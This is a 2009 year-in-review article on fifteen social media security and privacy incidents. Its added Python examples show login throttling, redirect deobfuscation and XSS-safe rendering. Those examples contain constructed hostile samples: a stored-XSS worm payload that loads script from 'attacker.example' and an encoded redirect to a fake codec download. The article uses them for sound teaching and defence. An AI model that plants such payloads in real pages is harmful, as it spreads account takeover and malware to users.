Co-Authored with Tom Eston, SocialMediaSecurity.com
This year was momentous for social media. Twitter exploded, garnering global press and even a visit to the Oprah Winfrey Show. Facebook ate up rival social network FriendFeed and overhauled pretty much, well, everything. And, finally, businesses truly started attaching themselves to some sort of internal social media-related programs.
Leave it to the hackers to spoil all of the fun.
This year was certainly not without its challenges, especially for the more popular social networks mentioned above. New vulnerabilities targeted social network soft spots, while the social engineering of less-than-savvy Internet users reached new heights. The experts say that it won't get any better next year, either.
"We are going to see a lot more of the same in 2010 in terms of social networking and security issues, specifically a lot more privacy leaks and data leakage," said Dennis Cox, CTO and co-founder of BreakingPoint Systems, a provider of performance and security testing tools. "But I also see that hijacking of accounts is going to be much more prominent, particularly with celebrities, executives of large public companies and politicians who have a lot to lose."
That said, let's look at 15 significant social media and security/privacy events of 2009:
1. First Large Twitter Phishing Attack
The first widespread Twitter phishing attack, in January, was Internet social engineering at its finest. It's old hat now, but users were lured into clicking on a link to a fake Twitter site. How did this happen? The phishers preyed on the insecurity and ego of the victims by promising them a newly discovered funny blog post... about them. The link led to a look-alike Twitter login page; after entering their credentials there, victims were redirected back to the real Twitter, which made it look as if they had simply been logged out and needed to sign in again. Voila, welcome to a compromised account.
2. Weak Twitter Support Admin Password Leads to Compromised Accounts
According to Wired, an 18-year-old hacker took responsibility for hijacking 33 high-profile Twitter accounts by running a rapid-fire dictionary attack against the login page of Twitter's support portal. The password: "happiness." This was an embarrassment for Twitter (which now rate-limits login attempts and locks accounts after multiple failed password guesses), and a wake-up call for everyone with a simple, dictionary-based password.
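What a login rate limit of the kind Twitter added actually has to do is illustrated by the following Python example. It is an added example written for this article, not Twitter's code; its thresholds (five failures in five minutes, a fifteen-minute lockout) and the "support-admin" account name are assumptions, and the wordlist and the real password are constructed for the demonstration.

```python
import time
from collections import defaultdict, deque

# Policy values are assumptions chosen for the example, not Twitter's actual settings.
MAX_FAILURES = 5        # failures tolerated inside the window before locking
WINDOW_SECONDS = 300    # sliding window over which failures are counted
LOCKOUT_SECONDS = 900   # how long a locked account stays locked


class LoginThrottle:
    """Track failed logins per account and lock the account after too many in a window."""

    def __init__(self, max_failures=MAX_FAILURES, window=WINDOW_SECONDS,
                 lockout=LOCKOUT_SECONDS, clock=time.monotonic):
        self.max_failures = max_failures
        self.window = window
        self.lockout = lockout
        self.clock = clock                    # injectable so a simulation can fake time
        self._failures = defaultdict(deque)   # account -> timestamps of recent failures
        self._locked_until = {}               # account -> time the lock expires

    def is_locked(self, account):
        now = self.clock()
        until = self._locked_until.get(account)
        if until is None:
            return False
        if now >= until:                      # lock expired: start with a clean slate
            del self._locked_until[account]
            self._failures[account].clear()
            return False
        return True

    def record_failure(self, account):
        """Record one failed guess; returns True if this one triggered a lockout."""
        now = self.clock()
        recent = self._failures[account]
        while recent and now - recent[0] > self.window:   # drop failures outside the window
            recent.popleft()
        recent.append(now)
        if len(recent) >= self.max_failures:
            self._locked_until[account] = now + self.lockout
            return True
        return False

    def record_success(self, account):
        self._failures.pop(account, None)


def attempt_login(throttle, account, password, verify):
    """Gate the real credential check (verify) behind the throttle.

    Returns 'locked', 'denied' or 'ok'. A locked account is refused even when the
    guess is correct, which is what stops a dictionary run from ever confirming a hit.
    """
    if throttle.is_locked(account):
        return "locked"
    if verify(account, password):
        throttle.record_success(account)
        return "ok"
    throttle.record_failure(account)
    return "locked" if throttle.is_locked(account) else "denied"


def simulate_dictionary_attack(wordlist, real_password="happiness"):
    """Constructed simulation: an attacker fires a wordlist at one support account.

    A fake clock spaces the guesses 0.1 s apart. Returns (word, outcome) pairs.
    """
    fake_now = [0.0]
    throttle = LoginThrottle(clock=lambda: fake_now[0])

    def verify(account, password):            # stand-in for the real password check
        return password == real_password

    outcomes = []
    for word in wordlist:
        fake_now[0] += 0.1
        outcomes.append((word, attempt_login(throttle, "support-admin", word, verify)))
    return outcomes


if __name__ == "__main__":
    # Constructed wordlist; the real password sits after the lockout threshold.
    for word, outcome in simulate_dictionary_attack(
            ["password", "123456", "qwerty", "letmein", "welcome", "dragon", "happiness"]):
        print(f"{word:12} {outcome}")
```

One trade-off a practitioner should keep in mind: locking by account name lets anyone who knows a username lock its owner out, so production systems pair this with per-source throttling and CAPTCHAs. Even so, a lockout that refuses the correct guess is a far better position than letting an attacker run an unlimited dictionary.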
3. Rogue LinkedIn Profiles Lead Users to Malware
Usually perceived as the safest of the popular social networks because of its more passive use, LinkedIn itself succumbed to some rogue activity in January when attackers created fake celebrity profiles to lure users to malware-laden sites. A McAfee security researcher discovered that hundreds of fake LinkedIn profiles promising everything from a nude "Kate Hudson" to a nude "Hulk Hogan" not only existed but were driving users from LinkedIn to Web sites containing obfuscated script code that decodes to a simple browser redirection. According to McAfee, a user would "end up on different malicious websites trying the classical social-engineering tricks of either the 'missing video codec' or of showing a fake AV scan and telling the user that his computer was infected with malware and offering a 'free' AV scanner software, which in fact is the real threat."
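The "obfuscated script code which decodes to a simple browser redirection" is the kind of thing an analyst unpacks by hand. The Python below, an added example and not McAfee's tooling, automates the one common case in which the obfuscation is percent-encoding fed to JavaScript's unescape(); that assumption, the sample script and the hostname in it are all constructed for the example.

```python
import re
from urllib.parse import unquote

# One unescape('...') call, single- or double-quoted, wrapping a percent-encoded body.
UNESCAPE_CALL = re.compile(r"""unescape\(\s*(['"])(.*?)\1\s*\)""", re.S)
# A plain client-side redirect: [window.|document.|top.]location[.href] = "url"
REDIRECT = re.compile(
    r"""(?:window\.|document\.|top\.)?location(?:\.href)?\s*=\s*(['"])(.*?)\1""")


def deobfuscate(script, max_rounds=5):
    """Strip unescape('%XX...') layers until the script stops changing.

    Assumption (not stated in the article): the obfuscation is percent-encoding passed
    to unescape(), the most common JavaScript trick of the period. Other schemes are
    left untouched, and JavaScript's %uXXXX form is not decoded by urllib's unquote.
    Bounding the rounds keeps a pathological input from looping forever.
    """
    for _ in range(max_rounds):
        decoded = UNESCAPE_CALL.sub(lambda m: unquote(m.group(2)), script)
        if decoded == script:
            break
        script = decoded
    return script


def extract_redirects(script):
    """Return every URL the decoded script assigns to location."""
    return [m.group(2) for m in REDIRECT.finditer(deobfuscate(script))]


# Constructed sample in the style of an injected redirect; the hostname is made up.
SAMPLE = ('document.write(unescape("%3Cscript%3Ewindow.location%3D%22'
          'http%3A//malicious.example/codec.exe%22%3C/script%3E"));')

if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
    print(extract_redirects(SAMPLE))
```

Run against the constructed sample, the decoder yields a script tag that sets window.location to the fake "codec" download, which is exactly the lure McAfee describes; the extracted URL is what an analyst would feed to blocklists or further sandboxing.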
4. Facebook Changes TOS... and Changes its Mind
Facebook started a wildfire debate in February when the goliath social network issued new Terms of Service (TOS) and then retracted them after an overwhelmingly negative response from users. The retracted TOS essentially said that Facebook held ownership over all users' content even after a profile was deleted, and that this content "could be used, modified or sublicensed." Protest groups sprouted up over Facebook's attempt to keep all of its users' data forever. Even though the TOS were taken back and Facebook went to tremendous effort to "include" users in its TOS update, the episode was an aha moment that showed users how unprotected their data is on social networks.
5. Rogue Facebook Applications Found
In February, two alarming rogue Facebook applications were found. The first notified users that their friends were having trouble viewing the recipient's profile and prompted the recipient to click through to check the errors. Rather than landing on Facebook, however, the user ended up on another application that, if installed, would collect their personal details. The second rogue app told notification recipients that a friend had reported them to Facebook for alleged TOS violations. When the concerned user clicked to learn more, he or she might have installed an application that then spammed friends and potentially harvested personal information.
6. Twitter Hit by StalkDaily; Exposes XSS Issues
Jump forward to April, when a worm spread through a cross-site scripting vulnerability in Twitter: script injected into an infected account posted links to a malicious site from that account without the user's consent. Infected users watched their own accounts spam other users, who in turn could become infected, and some were locked out of their accounts while the worm kept propagating. Because this was an XSS attack, it forced Twitter to change its security measures to reduce the probability of these types of attacks.
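The root cause of a worm like this is a profile field rendered into the page without escaping. The Python below, an added example and not Twitter's code, shows the vulnerable rendering beside a hardened one; the field names, the worm payload and the attacker hostname are constructed for the demonstration. It also covers the edge case escaping alone does not fix: a URL field, where "javascript:alert(1)" contains no character to escape and has to be rejected by scheme instead.

```python
import html
from urllib.parse import urlsplit

# Constructed payload of the kind a profile-spreading worm stores: a script tag that
# fetches the worm code from a host under the attacker's control (hostname made up).
WORM_BIO = '<script src="http://attacker.example/worm.js"></script>'
SAFE_SCHEMES = {"http", "https"}


def render_profile_unsafe(name, website, bio):
    """Vulnerable: user-supplied profile fields are concatenated straight into HTML.

    Anyone viewing this profile runs whatever the bio contains. That is the stored
    XSS a profile worm needs: the payload then writes itself into the viewer's own
    profile and posts from the viewer's account.
    """
    return (f'<div class="profile"><h1>{name}</h1>'
            f'<a href="{website}">{website}</a>'
            f'<p>{bio}</p></div>')


def safe_href(url):
    """Allow only absolute http(s) URLs in an href.

    javascript:, data:, and bare attribute-breaking strings all collapse to '#'.
    Escaping by itself is not enough for a URL attribute because
    'javascript:alert(1)' contains nothing an HTML escaper would touch.
    """
    url = url.strip()
    parts = urlsplit(url)
    if parts.scheme.lower() not in SAFE_SCHEMES or not parts.netloc:
        return "#"
    return html.escape(url, quote=True)   # still escape: the URL lands in an attribute


def render_profile_safe(name, website, bio):
    """Hardened: every field is escaped for the context it lands in."""
    def esc(s):                            # text and attribute context
        return html.escape(s, quote=True)
    return (f'<div class="profile"><h1>{esc(name)}</h1>'
            f'<a href="{safe_href(website)}">{esc(website)}</a>'
            f'<p>{esc(bio)}</p></div>')


if __name__ == "__main__":
    print("unsafe:", render_profile_unsafe("alice", "javascript:alert(1)", WORM_BIO))
    print("safe:  ", render_profile_safe("alice", "javascript:alert(1)", WORM_BIO))
```

The hardened version is not the end of the story: a real site will also want a Content Security Policy so that even a missed escaping bug cannot load script from an attacker's host, and its templating engine should escape by default rather than relying on every developer remembering to call esc().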
7. More Privacy Issues for Facebook: Canadian Version
The Office of the Privacy Commissioner of Canada issued a report in July stating that Facebook did not comply with the country's strict privacy laws and gave the social network 30 days to make the required changes. Facebook promptly responded and worked with the Commissioner's office to reach a privacy agreement before its 12 million Canadian users were affected.
8. Month of Twitter Bugs
To push Twitter into addressing its API issues more aggressively, security researcher Aviv Raff announced the "Month of Twitter Bugs." Each day of that month Raff promised to publish a new vulnerability in a third-party Twitter service or application, giving 24 hours' notice before each one went public. The effort made Twitter, and its users, more aware than ever of the security holes in the ecosystem built around the service.
9. Twitter-Based Botnet Command Channel Found
In August, a researcher at Arbor Networks found a botnet that used Twitter as its command and control channel. According to the researcher, the botnet uses status messages to "send out new links to contact, then these contain new commands or executables to download and run. It's an infostealer operation." The botnet was reported to have infected thousands of PCs before it was shut down by Twitter.
10. Month of Facebook Bugs
Similar to the Month of Twitter Bugs, security researcher theharmonyguy launched the Month of Facebook Bugs, reporting one vulnerability to Facebook every day, each of them reachable through applications built on the site. His discoveries were quite telling: they showed how little privacy Facebook user data really has, and exposed holes in the social network's application development process and the lack of any proper vetting of apps before they are published to users.
11. New Research Exposes More of Koobface
Trend Micro security researcher Ryan Flores published an enlightening blog post and research paper highlighting several new discoveries about the notorious Koobface worm. Koobface, which started out as a Facebook attack but spread to both Twitter and MySpace, was reported to be stealing user pictures in addition to personal information. Flores also said that Koobface is able to bypass Facebook's spam filtering.
12. Hacked Facebook Apps Push Fake AV Software
Security company AVG discovered that a handful of Facebook applications had been hacked and were pushing fake antivirus software, which was itself the malware being delivered to users. The applications were generating iframes with "information" about antivirus trends and offering a fake "solution."
13. Facebook Used as Command and Control for Crimeware
As reported in The Register, crimeware distributors started using Facebook as a command and control channel for a "Trojan that turns compromised Windows PCs into zombie drones." According to the article, the zombie clients polled the Notes section of Facebook through its mobile clients to receive instructions. The client would then send out booby-trapped email attachments.
14. New Facebook Privacy Settings
Likely fresh in everyone's mind, Facebook just last week pushed live its new privacy settings, which claim to give users additional control over their profile information and to make privacy settings easier to use for novice site members. The issue that crept up, and is still a point of discussion, is that Facebook now gives users the appearance of more privacy controls while they actually have less privacy. Unless users remove themselves from the search database entirely, they cannot hide their main photos, friends lists or fan pages. In this effort to make Facebook more private, the social network exposed more of its users (a move that makes one wonder whether advertising demographics matter more than user privacy).
15. 3,500 New York Sex Offenders Taken Off of SocNet Sites
Fifteen social network sites in total have now removed, or will remove, 3,500 New York sex offenders from their databases and will block those users from the sites. The social networks have agreed to use New York's Electronic Securing and Targeting of Online Predators Act, also known as e-STOP, which requires registered sex offenders to report their email addresses, screen names and other Internet identifiers to authorities.
Again, BreakingPoint's Cox believes that this year's security issues are only the tip of the iceberg. He predicts that social networks will witness much more cybercrime led by organized syndicates.
"This is a no-brainer for organized crime and it is already happening as people move more and more of their information to social networks, connect them to various accounts and basically provide easy access for anyone through their computers, or even an iPhone," he said. "On the flip side of threats, you will unfortunately see more violent crime spawned through social network interaction and police using social networking updates as evidence in criminal cases. This, of course, will lead to more privacy issues as we will witness the government probing into social networks more to grab data about our online activities."